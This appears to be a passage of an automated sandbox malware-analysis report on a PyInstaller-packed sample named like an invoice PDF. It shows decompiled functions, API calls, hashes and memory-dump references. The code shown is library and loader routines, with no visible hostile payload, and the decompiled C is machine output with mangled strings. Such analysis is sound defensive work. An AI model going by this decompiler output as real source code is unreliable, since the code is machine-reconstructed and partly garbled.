                            • Opcode ID: 003178f95ac098b232ad2e462495ea947c60f576e743d45651ad2da7568ea18b
                            • Instruction ID: f2ca3127a10d6da25d5cba1fe9cec61e7090a18caa14140f1490fe31fabdf704
                            • Opcode Fuzzy Hash: 003178f95ac098b232ad2e462495ea947c60f576e743d45651ad2da7568ea18b
                            • Instruction Fuzzy Hash: BD415BB37E010ADFEB004BEDEC81A55B3A3EB9622AB540165F915CB243DB21C48BC790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F2250, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 163COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_CheckPositional.PYTHON38(name,?,00000001,00000002), ref: 6E2F2291
                            • _PyArg_BadArgument.PYTHON38(name,argument 1,a unicode character,?), ref: 6E2F22BC
                            • _PyUnicode_Ready.PYTHON38 ref: 6E2F22DF
                            • PyErr_SetString.PYTHON38(6E79ED94,no such name), ref: 6E2F23AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_$ArgumentCheckErr_PositionalReadyStringUnicode_
                            • String ID: a unicode character$argument 1$name$no such name
                            • API String ID: 391777190-3118485279
                            • Opcode ID: c89c6c277e2dda6a66d8b169b28b37e8d5123946e284813776459a73d9e1a65c
                            • Instruction ID: dc866fffe5a0d97d51336a4efa658e10eddbc8896ee29ece10b134a2063e71d0
                            • Opcode Fuzzy Hash: c89c6c277e2dda6a66d8b169b28b37e8d5123946e284813776459a73d9e1a65c
                            • Instruction Fuzzy Hash: F75139B3BA014DDFD7008BE9DC81BADB7F6EB4A315F1001A9E905DB281DB31C8468B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F3690, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117COMMON
                            Download Yara Rule
                            APIs
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F36AB
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A28), ref: 6E2F36E3
                            • PyUnicode_Compare.PYTHON38(?,00000000), ref: 6E2F3733
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6E2F3744
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A34), ref: 6E2F3759
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F837C), ref: 6E2F3777
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8370), ref: 6E2F3790
                            • PyErr_SetString.PYTHON38(6E79ED94,invalid normalization form), ref: 6E2F37B3
                            Strings
                            • invalid normalization form, xrefs: 6E2F37AC
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Equal$CompareDeallocErr_ReadyString
                            • String ID: invalid normalization form
                            • API String ID: 3010910608-2281882113
                            • Opcode ID: f471013bcec61d158a155b03a2f40b346b628af99913bf9e5a0cc89deee4c788
                            • Instruction ID: 2e2e8a6b1d100ba4e2dd40bcb5bcd8f54f0039880e86151c8d24a8c57de32de4
                            • Opcode Fuzzy Hash: f471013bcec61d158a155b03a2f40b346b628af99913bf9e5a0cc89deee4c788
                            • Instruction Fuzzy Hash: 7F31F731E90509EBDF004AA9EC8DA5AB776FB4233AF100164EC06D6341E762D952C6E6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F4483, Relevance: 15.1, APIs: 10, Instructions: 136COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E6E2F4483(void* __ebx, void* __edx, void* __edi) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				void* _t75;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				E6E2F5090(__ebx, __edi, 0x6e3f7600, 0x10);
				_t34 =  *0x6e3f8a48; // 0x1
				if(_t34 > 0) {
					 *0x6e3f8a48 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6E2F4B2A();
					 *(_t82 - 4) = 1;
					__eflags = "urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" - 2;
					if("urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" != 2) {
						E6E2F4E29(_t68, 1, _t75, 7);
						asm("int3");
						E6E2F5090(__ebx, 1, 0x6e3f7628, 0xc);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6E2F463E( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t76 = E6E2F4329(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t76 = E6E2F4A3C( *((intOrPtr*)(_t82 + 8)), _t72);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6E2F4A3C( *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6E2F4483(_t58, _t68, _t72);
											_pop(_t61);
											E6E2F463E( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6E2F4329(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6E2F463E( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6e3f8a48 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6E2F4A6A(E6E2F4BF5());
						E6E2F5058();
						"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" = "urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6E2F4518();
						_t54 = E6E2F4D96( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6E2F4525();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}
















                            0x6e2f4483
                            0x6e2f448a
                            0x6e2f448f
                            0x6e2f4496
                            0x6e2f449d
                            0x6e2f44a5
                            0x6e2f44a8
                            0x6e2f44b1
                            0x6e2f44b4
                            0x6e2f44b7
                            0x6e2f44be
                            0x6e2f452d
                            0x6e2f4532
                            0x6e2f453a
                            0x6e2f453f
                            0x6e2f4542
                            0x6e2f4544
                            0x6e2f4555
                            0x6e2f4555
                            0x6e2f4559
                            0x6e2f455c
                            0x6e2f4568
                            0x6e2f4568
                            0x6e2f4575
                            0x6e2f4577
                            0x6e2f457a
                            0x6e2f457c
                            0x6e2f458c
                            0x6e2f458e
                            0x6e2f4591
                            0x6e2f4593
                            0x00000000
                            0x00000000
                            0x6e2f4593
                            0x6e2f455e
                            0x6e2f455e
                            0x6e2f4561
                            0x00000000
                            0x6e2f4563
                            0x6e2f4563
                            0x6e2f4599
                            0x6e2f4599
                            0x6e2f45a3
                            0x6e2f45a5
                            0x6e2f45a8
                            0x6e2f45ab
                            0x6e2f45ad
                            0x6e2f45af
                            0x6e2f45b1
                            0x6e2f45b6
                            0x6e2f45bb
                            0x6e2f45bd
                            0x6e2f45bd
                            0x6e2f45c3
                            0x6e2f45c4
                            0x6e2f45c9
                            0x6e2f45cf
                            0x6e2f45cf
                            0x6e2f45af
                            0x6e2f45d4
                            0x6e2f45d6
                            0x6e2f45dd
                            0x6e2f45e7
                            0x6e2f45e9
                            0x6e2f45ec
                            0x6e2f45ee
                            0x6e2f45fa
                            0x6e2f4622
                            0x6e2f4622
                            0x6e2f45d8
                            0x6e2f45d8
                            0x6e2f45db
                            0x00000000
                            0x00000000
                            0x6e2f45db
                            0x6e2f45d6
                            0x6e2f4561
                            0x6e2f4625
                            0x6e2f462c
                            0x6e2f4546
                            0x6e2f4546
                            0x6e2f454c
                            0x00000000
                            0x6e2f454e
                            0x6e2f454e
                            0x6e2f454e
                            0x6e2f454c
                            0x6e2f4631
                            0x6e2f463d
                            0x6e2f44c0
                            0x6e2f44c5
                            0x6e2f44ca
                            0x6e2f44cf
                            0x6e2f44d6
                            0x6e2f44da
                            0x6e2f44e4
                            0x6e2f44f0
                            0x6e2f44f2
                            0x6e2f44f2
                            0x6e2f44f4
                            0x6e2f44f7
                            0x6e2f44fe
                            0x6e2f4503
                            0x00000000
                            0x6e2f4503
                            0x6e2f4498
                            0x6e2f4498
                            0x6e2f4505
                            0x6e2f4508
                            0x6e2f4514
                            0x6e2f4514

                            APIs
                            • __RTC_Initialize.LIBCMT ref: 6E2F44CA
                            • ___scrt_uninitialize_crt.LIBCMT ref: 6E2F44E4
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Initialize___scrt_uninitialize_crt
                            • String ID:
                            • API String ID: 2442719207-0
                            • Opcode ID: fefba9489bc703953f1b69f7fc4fdd4de40285b4b8159cd83f501498a4f16333
                            • Instruction ID: a3cfae28fe55ad21c2e6b4a76598b778ee7803f0f58aa04ba9670220c75ddbed
                            • Opcode Fuzzy Hash: fefba9489bc703953f1b69f7fc4fdd4de40285b4b8159cd83f501498a4f16333
                            • Instruction Fuzzy Hash: 3E41E672E8421DEFDF209FD5DE00BAEB7BAEF8575AF114519E81466240D7B08E038B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01324331, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01324331(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x1335190) {
					E013209EB(_t52);
					_t26 = _a4;
				}
				E013209EB( *((intOrPtr*)(_t26 + 0x3c)));
				E013209EB( *((intOrPtr*)(_a4 + 0x30)));
				E013209EB( *((intOrPtr*)(_a4 + 0x34)));
				E013209EB( *((intOrPtr*)(_a4 + 0x38)));
				E013209EB( *((intOrPtr*)(_a4 + 0x28)));
				E013209EB( *((intOrPtr*)(_a4 + 0x2c)));
				E013209EB( *((intOrPtr*)(_a4 + 0x40)));
				E013209EB( *((intOrPtr*)(_a4 + 0x44)));
				E013209EB( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E013241F7(5,  &_v8);
				_v8 =  &_a4;
				return E01324247(4,  &_v8);
			}




                            0x01324337
                            0x0132433a
                            0x01324342
                            0x01324345
                            0x0132434a
                            0x0132434d
                            0x01324351
                            0x0132435c
                            0x01324367
                            0x01324372
                            0x0132437d
                            0x01324388
                            0x01324393
                            0x0132439e
                            0x013243ac
                            0x013243b4
                            0x013243bd
                            0x013243c5
                            0x013243d9

                            APIs
                            • _free.LIBCMT ref: 01324345
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01324351
                            • _free.LIBCMT ref: 0132435C
                            • _free.LIBCMT ref: 01324367
                            • _free.LIBCMT ref: 01324372
                            • _free.LIBCMT ref: 0132437D
                            • _free.LIBCMT ref: 01324388
                            • _free.LIBCMT ref: 01324393
                            • _free.LIBCMT ref: 0132439E
                            • _free.LIBCMT ref: 013243AC
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 1569baea8775124a8ccd759ef41fade24598740aa03c4a0c5b40bec9c3fd43d8
                            • Instruction ID: a34deb2c0a6f41a3edc958bb7818b9b1a17d5b04330505ef6cb35815d45663c1
                            • Opcode Fuzzy Hash: 1569baea8775124a8ccd759ef41fade24598740aa03c4a0c5b40bec9c3fd43d8
                            • Instruction Fuzzy Hash: 7811F876200519BFDB05FF59C882CDE3BB5EF15254B4140A2FA4A8F231DA31EE55DB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01313C70, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                            Download Yara Rule
                            C-Code - Quality: 64%
                            			E01313C70(void* __edx, char _a4, short _a36, signed int _a8228, intOrPtr _a8236, intOrPtr _a8240) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				signed int _t13;
				intOrPtr _t24;
				void* _t27;
				WCHAR* _t28;
				WCHAR* _t37;
				intOrPtr _t45;
				void* _t47;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t72;
				signed int _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				E01317880();
				_t13 =  *0x133c008; // 0xa212446c
				_a8228 = _t13 ^ _t74;
				_push(_t50);
				_t72 = _a8240;
				_v0 = _a8236;
				_push(_t57);
				if(_t72 == 0) {
					_t51 = _v0;
					L6:
					GetTempPathW(0x1000,  &_a36);
					E01314710(_t53,  &_a4, 0x10, L"_MEI%d", GetCurrentProcessId());
					_t75 = _t74 + 0x10;
					_t64 = 0;
					__eflags = 0;
					while(1) {
						_t58 = E0131F329( &_a36,  &_a4);
						_t24 = E01314B30();
						_t76 = _t75 + 0xc;
						__eflags = _t24;
						if(_t24 == 0) {
							break;
						}
						L01319803(_t58);
						_t64 = _t64 + 1;
						_t75 = _t76 + 4;
						__eflags = _t64 - 5;
						if(_t64 < 5) {
							continue;
						}
						__eflags = _t72;
						if(_t72 == 0) {
							L4:
							_t27 = 0;
							L18:
							E0131786A();
							return _t27;
						}
						_t37 = E01314BF0(0, "TMP", 0);
						__eflags = _t51;
						if(_t51 == 0) {
							_t68 = _t37;
							SetEnvironmentVariableW(_t37, 0);
							L01319803(_t68);
							_t77 = _t75 + 0x10;
							_t27 = 0;
						} else {
							_t61 = _t37;
							_t69 = E01314BF0(0, _t51, 0);
							E0131E1FC(_t37, _t40);
							L01319803(_t61);
							L01319803(_t69);
							L01319803(_t51);
							_t77 = _t75 + 0x2c;
							_t27 = 0;
						}
						goto L18;
					}
					E01314C90(_v0, _t58, 0x1000);
					L01319803(_t58);
					_t77 = _t76 + 0x10;
					__eflags = _t72;
					if(_t72 != 0) {
						_t28 = E01314BF0(0, "TMP", 0);
						__eflags = _t51;
						if(_t51 == 0) {
							_t66 = _t28;
							SetEnvironmentVariableW(_t28, 0);
							L01319803(_t66);
							_t77 = _t77 + 0x10;
						} else {
							_t60 = _t28;
							_t67 = E01314BF0(0, _t51, 0);
							E0131E1FC(_t28, _t31);
							L01319803(_t60);
							L01319803(_t67);
							L01319803(_t51);
							_t77 = _t77 + 0x2c;
						}
					}
					_t27 = 1;
					goto L18;
				}
				_push("TMP");
				_t45 = E01313E40(_t50, _t57);
				_push(_t72);
				_t51 = _t45;
				_t62 = E01313980();
				_t77 = _t74 + 8;
				if(_t46 == 0) {
					goto L4;
				}
				_t47 = E0131E1FC(L"TMP", _t62);
				L01319803(_t62);
				_t74 = _t77 + 0xc;
				_t83 = _t47;
				if(_t47 == 0) {
					goto L6;
				} else {
					_push("LOADER: Failed to set the TMP environment variable.\n");
					E01311910(_t83);
					_t77 = _t74 + 4;
					goto L4;
				}
			}























                            0x01313c75
                            0x01313c7a
                            0x01313c81
                            0x01313c8f
                            0x01313c91
                            0x01313c98
                            0x01313c9d
                            0x01313ca0
                            0x01313ceb
                            0x01313cef
                            0x01313cf9
                            0x01313d11
                            0x01313d16
                            0x01313d19
                            0x01313d19
                            0x01313d20
                            0x01313d2f
                            0x01313d32
                            0x01313d37
                            0x01313d3a
                            0x01313d3c
                            0x00000000
                            0x00000000
                            0x01313d3f
                            0x01313d44
                            0x01313d45
                            0x01313d48
                            0x01313d4b
                            0x00000000
                            0x00000000
                            0x01313d4d
                            0x01313d4f
                            0x01313ce4
                            0x01313ce4
                            0x01313e25
                            0x01313e32
                            0x01313e3d
                            0x01313e3d
                            0x01313d5a
                            0x01313d5f
                            0x01313d61
                            0x01313d97
                            0x01313d9c
                            0x01313da3
                            0x01313da8
                            0x01313dab
                            0x01313d63
                            0x01313d68
                            0x01313d6f
                            0x01313d73
                            0x01313d79
                            0x01313d7f
                            0x01313d85
                            0x01313d8a
                            0x01313d8d
                            0x01313d8d
                            0x00000000
                            0x01313d61
                            0x01313db9
                            0x01313dbf
                            0x01313dc4
                            0x01313dc7
                            0x01313dc9
                            0x01313dd4
                            0x01313dd9
                            0x01313ddb
                            0x01313e0c
                            0x01313e11
                            0x01313e18
                            0x01313e1d
                            0x01313ddd
                            0x01313de2
                            0x01313de9
                            0x01313ded
                            0x01313df3
                            0x01313df9
                            0x01313dff
                            0x01313e04
                            0x01313e04
                            0x01313ddb
                            0x01313e20
                            0x00000000
                            0x01313e20
                            0x01313ca2
                            0x01313ca7
                            0x01313cac
                            0x01313cad
                            0x01313cb4
                            0x01313cb6
                            0x01313cbb
                            0x00000000
                            0x00000000
                            0x01313cc3
                            0x01313ccb
                            0x01313cd0
                            0x01313cd3
                            0x01313cd5
                            0x00000000
                            0x01313cd7
                            0x01313cd7
                            0x01313cdc
                            0x01313ce1
                            0x00000000
                            0x01313ce1

                            APIs
                            • GetTempPathW.KERNEL32(00001000,?,?,?,00000000,00000000,01313C46,?,00000000,?,pyi-runtime-tmpdir), ref: 01313CF9
                            • GetCurrentProcessId.KERNEL32 ref: 01313CFF
                              • Part of subcall function 01313E40: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,013124FE,_MEIPASS2), ref: 01313E76
                              • Part of subcall function 01313E40: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,013124FE,_MEIPASS2), ref: 01313E92
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 01313D9C
                              • Part of subcall function 01314C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,An attempt to set the process default activation context failed because the process default activation context was already set.,?,00001000,?,?), ref: 01314CAA
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,?,?,?,00000000,0131210F,?,?), ref: 01313E11
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
